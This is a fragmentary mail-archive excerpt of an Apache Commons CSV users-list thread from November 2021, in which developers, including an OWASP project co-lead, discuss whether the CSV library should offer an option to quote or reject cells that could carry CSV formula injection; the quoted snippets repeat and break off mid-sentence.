Comments from Matt's partner in crime inline, below. -kevin
[This probably will bounce on the Commons Users List since I'm not
subscribed to that mailing list, but if you want it there, any of you who
is subscribed have my permission to forward it.]
On Thu, Nov 11, 2021 at 7:11 PM Matt Seil
The TLDR version: OWASP's recommendation is specifically to render code
intended to be executed as unexecutable. I'd suggest a fix be done at
OWASP-Java-Encoder project and not here. I believe the suggestion of
providing this feature even at OWASP has near-zero value in the long run
because
if actually quoting is enough and all should
> prefer xml based office formats anyway.
> >
> > I won’t mind to accept a tester patch for such an option. Maybe even
> unsafe-pass-default/quote-injection/reject-injection enum.
> >
> > Gruss
> > Bernd
> >
&
s.net
>
> Von: sebb
> Gesendet: Thursday, November 11, 2021 3:42:08 PM
> An: Commons Users List
> Cc: Gary Gregory ; ms...@acm.org
> Betreff: Re: [csv] Does the library provide means to circumvent CSV injection
>
> On Thu, 11 Nov 2021 at
s Users List
Cc: Gary Gregory ; ms...@acm.org
Betreff: Re: [csv] Does the library provide means to circumvent CSV injection
On Thu, 11 Nov 2021 at 11:36, P. Ottlinger wrote:
>
> Hi guys,
>
> thanks for your reply.
>
> Maybe I'm misinterpreting something but I thought that it cou
/reject-injection enum.
Gruss
Bernd
--
http://bernd.eckenfels.net
Von: sebb
Gesendet: Thursday, November 11, 2021 3:42:08 PM
An: Commons Users List
Cc: Gary Gregory ; ms...@acm.org
Betreff: Re: [csv] Does the library provide means to circumvent CSV injection
On Thu, 11 Nov 2021 at 11:36, P. Ottlinger wrote:
>
> Hi guys,
>
> thanks for your reply.
>
> Maybe I'm misinterpreting something but I thought that it could be made
> possible to configure CSVFormat-object when writing the CSV data in a
> way that any data with possibly corrupting values (as
Hi guys,
thanks for your reply.
Maybe I'm misinterpreting something but I thought that it could be made
possible to configure CSVFormat-object when writing the CSV data in a
way that any data with possibly corrupting values (as shown on the OWASP
page) will mask the whole contents of the cell.
I agree with Matt. CSV is just a container, it doesn't know or care what
the concept of a "formula" is.
Gary
On Wed, Nov 10, 2021, 14:49 Matt Seil wrote:
> Hello,
>
> I'm Matt Seil, project co-lead for OWASP's ESAPI-Java-Legacy project.
>
> This email caught my attention. In short, I don't
Hello,
I'm Matt Seil, project co-lead for OWASP's ESAPI-Java-Legacy project.
This email caught my attention. In short, I don't think you're going to
get an affirmative answer because the potential use cases are too
numerous. I'm totally speaking out of turn here however, there may be
10 matches
Mail list logo